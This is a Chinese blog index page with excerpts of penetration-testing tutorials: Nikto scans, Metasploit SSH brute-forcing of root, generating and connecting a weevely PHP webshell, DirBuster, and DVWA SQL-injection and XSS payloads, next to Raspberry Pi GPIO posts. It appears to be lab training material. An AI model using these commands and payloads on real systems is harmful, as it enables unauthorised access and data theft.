KALI

【教程】Nikto漏洞扫描

阅读(933)评论(0)

Nikto漏洞扫描基础 1.一般扫描 nikto -h http://172.16.1.102 -p 80 //可以看到apache版本号,php版本号等... 2.扫描cgi-bin目录 nikto -Cgidirs cgi-bin -h http://172.16.1.10...

KALI

【教程】metasploit爆破篇

阅读(1082)评论(0)

metasploit爆破篇 爆破SSH 1.选择模块 use auxiliary/scanner/ssh/ssh_login 2.设置爆破参数 set rhosts 172.16.1.101 //爆破地址 set username root //设置用户名 ...

KALI

【教程】 Kali中的菜刀weevely

阅读(839)评论(0)

Kali里的中国菜刀 生成木马 weevely generate pass /root/shell.php //pass为shell密码,shell.php为shell文件名 连接webshell weevvely http://192.168.113.166:81/shell.php pas...

KALI

【教程】DirBuster暴力破解目录

阅读(1189)评论(0)

DirBuster暴力破解目录 介绍:Kali Linux提供的目录扫描工具DirBuster支持全部的Web目录扫描方式。它既支持网页爬虫方式扫描,也支持基于字典暴力扫描,还支持纯暴力扫描。该工具使用Java语言编写,提供命令行(Headless)和图形界面(GUI)两种模式。其中,图形界面模式功能更为强大。用户不仅可以指...

web渗透

【教程】DVWA系列之SQL注入

阅读(464)评论(0)

DVWA系列之SQL注入(SQL Injection) LOW级别 1.输入1返回正常,输入1'返回异常。说明可能存在sql注入 2.遍历数据库所有内容 1'or'1'='1 3.查询数据库列数 1'order by 2 -- 1'order ...

web渗透

【教程】DVWA系列之XSS DOM

阅读(349)评论(0)

DVWA存储型跨站脚本攻击 LOW级别 1.代码审查,无任何保护。直接利用 2.随便选择个语言,提交后URL参数会成 xss_d/?default=English 3.写个弹窗验证漏洞,重构造url参数,将后面的English改成js的弹窗 <...

硬件开发

【教程】树莓派获取温湿度

阅读(361)评论(0)

树莓派获取dht11温湿度 代码 # -*- coding: UTF-8 -*- #!/usr/bin/python import RPi.GPIO as GPIO import time channel = 2 data = [] j = 0 #I/O口使用BCM编号方式 ...

硬件开发

【分享】Python GPIO库

阅读(550)评论(0)

树莓派Python GPIO编程基础 树莓派3b GPIO引脚图: 安装GPIO库 1.安装pip sudo apt-get -y python-pip #安装pip 2.安装RPi.GPIO (树莓派默认安装完成) sudo pip install rpi.gpio ...